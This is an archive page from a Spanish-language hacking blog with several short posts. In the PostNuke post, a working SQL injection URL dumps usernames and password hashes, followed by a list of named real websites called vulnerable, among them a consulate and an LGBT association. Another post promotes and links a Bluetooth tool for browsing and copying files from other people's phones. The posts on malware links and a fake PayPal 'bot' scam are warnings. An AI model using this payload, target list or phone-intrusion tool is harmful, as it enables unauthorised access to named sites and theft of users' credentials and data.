Archive for the ‘ Lamer ’ Category

Muerte de Osama Bin Laden utilizada para extender Malware

Debido al boom mediático que está teniendo la muerte del terrorista más buscado de todos los tiempos, son muchas las personas que tratan de aprovecharse de esto y extender enlaces maliciosos a través de redes sociales como twitter, facebook o tuenti, por lo que únicamente avisar y que andeis con ojo.

Vía | Kapersky

Nace intypedia project

intypedia project
Ha nacido intypedia project un wiki destinado a la seguridad informática donde más que texto se utilizarán videos para ejemplificar las cosas. Todas esas horas de no encontrar la opción que buscabais se han acabado. Espero que os sea de utilidad y sea un proyecto fructífero.
intypedia.com

Ha nacido intypedia project un wiki destinado a la seguridad informática donde más que texto se utilizarán videos para ejemplificar las cosas. Todas esas horas de no encontrar la opción que buscabais se han acabado. Espero que os sea de utilidad y sea un proyecto fructífero.
intypedia.com

Exploits del mes de abril

Bueno aquí os dejo un link a una serie de exploits que salieron a lo largo de abril, teneis desde desbordamiento de pila para bsplayer, hasta inyecciones sql… espero que os sea de utilidad.

Perdonad que no actualicemos más amenudo pero estamos teniendo problemas con el traslado de servidor… a ver si lo solucionamos pronto y retomamos el ritmo normal.

Un saludo

Ataque SQL Injection a PostNuke!

 Ha aparecido una vulnerabilidad de tipo SQL Injection en Postnuke.

 

Inyección de código:

 

index.php?module=PostSchedule&view=event&eid=-

 

 1′)+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/

 

 from/**/nuke_users/**/where/**/pn_uid=2/*

 

 

El autor de dicho descubrimiento es Vuln search Kacper (kacper1964_at_yahoo.pl) de http://devilteam.pl

 

Algunas páginas encontradas por Freelogs.Net vulnerables al ataque son:

 

www.exactas.org

www.trabajosocial.unam.mx

www.amigosdelaire.com

www.dentistasrioja.com

www.adolince.net

www.sirzee.itcr.ac.cr

www.azimutclm.com

 

Entre las webs más interesantes destacar:

 

www.consuladouy-bcn.org ( Consulado de Uruguay en Barcelona)

www.lasalle.es ( Mi Ex colegio xD )

www.sinver.org ( Asociación universitaria de GAYS y LESBIANAS DE Barcelona)

www.sexosintabues.com ( Comunidad Erótica de España)

 

Freelogs.NET no ha perpetrado ningún ataque, son datos informativos, no nos hacemos responsables del  uso que se le pueda dar a esta información.

 

 

 

 

 

Hackeador con cuenta Paypal hackeada!

Corre por ahí el mismo cuento de siempre. “ Robar password de Hotmail”: Manda un correo a este mail, hay un bot que te enviará la password poniendo estas sentencias en estas determinadas líneas.

 

El cuento ya va más allá de Hotmail o yahoo. Ahora Paypal. Lo bonito es que la gente sigue picando. Esta vez se nos dice que tenemos que registrar una cuenta Paypal, confirmarla con nuestra tarjeta de crédito, y mandar el mail con 4 chorradas sin sentido, y nuestros datos de paypal, a la dirección Paypal_bot_32@yahoo.com entre otras muchas dependiendo donde contrastemos la información.

 

En este phishing trampa para lammers y newbies non comentaban lo siguiente:

 

En la línea de asunto:
789bot4 * 5% 8verif-0e24Cuerpo del mensaje:

 


En la línea 1: Asunto-Type:? Text / plain = “+1”?En la línea 2: charset = us-English

En la línea 3: botbody * 78 # 9 confirmation0e24.yahoo.com

En la línea 4: p38ylec00rm::% s% (a href = http://www.paypal.com%%)

En la línea 5: Su dirección de correo electrónico principal en paypal

En la línea 6: start (recuperar> 07)

En la línea 7: check # 8% (* valor = = float)

En la línea 8: La contraseña de PayPal

En la línea 9: # searchppagend72hrlog

En la línea 10 send #% * idR20334-tsa-0583

En la línea 11 (#% 7 * tmbot *= “+098”)

 

 

Algunas páginas en las que he leído semejante chorrada, que demuestra que el bloggero no testea la información publicada es:

 

http://buluxan.wordpress.com/2008/04/19/how-to-hack-paypal/

 

http://hackpaypal.wordpress.com/2008/01/15/how-to-hack-paypalcom/

 

http://free7.wordpress.com/2008/01/10/warning-paypal-hacking/

 

MiyuX, Hack móvil por bluetooth!

La tecnología móvil avanza, y con ella, los programadores java con ganas de hacer aplicaciones interesantes para móviles. Miyux es un programita en java, que instalado en tu móvil te dará la posibilidad de “hackear” otros móviles vía bluetooth. Lo instalas y de primeras te pide que predetermines una carpeta para guardar lo que copies de otros móviles.

 

Por el momento sus opciones son bastante limitadas, pero es una beta, y una beta de un particular con lo cual tardará en mejorar o quizás se quede estancada. Podremos copiar, y navegar por el otro móvil, pero nada de borrar y modificar todavía.

Como crítica decir que si intentas abrir carpetas con bastantes archivos va lento, y puede llegar a tardar hasta medio minuto para ver carpetas con 200 archivos.

 

Ya había usado algún programa que pasado por bluetooth a la víctima te permitía ver la lista de contactos, pero esto lo supera con creces.

 

||DESCARGA|| (RapidShare)